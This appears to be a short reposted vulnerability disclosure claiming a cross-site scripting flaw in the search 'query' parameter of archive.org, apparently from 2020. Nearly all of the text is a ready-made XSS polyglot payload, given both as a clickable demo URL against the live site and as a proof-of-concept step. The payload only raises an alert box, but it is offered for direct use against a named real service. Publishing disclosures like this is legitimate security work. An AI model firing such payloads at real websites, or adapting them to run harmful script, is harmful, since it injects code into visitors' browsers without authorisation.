#Exploit Title : archive.org XSS
#Date : 2020/3/29
#Exploit Author : AmirAli Sadeghi Tamiz
#Tested on : win10
#Demo : https://archive.org/search.php?query=’;alert(String.fromCharCode(88,83,83))//’;alert(String.fromCharCode(88,83,83))//”;alert(String.fromCharCode(88,83,83))//”;alert(String.fromCharCode(88,83,83))//–></SCRIPT>”>’><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>

#POC:
1- go to archive.org
2-go to meta data search (archive.org/search.php?query=)
3-Parameter query is vulnerable
4-payload is: ‘;alert(String.fromCharCode(88,83,83))//’;alert(String.fromCharCode(88,83,83))//”;alert(String.fromCharCode(88,83,83))//”;alert(String.fromCharCode(88,83,83))//–></SCRIPT>”>’><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>





Source link

Write a comment:
*

Your email address will not be published.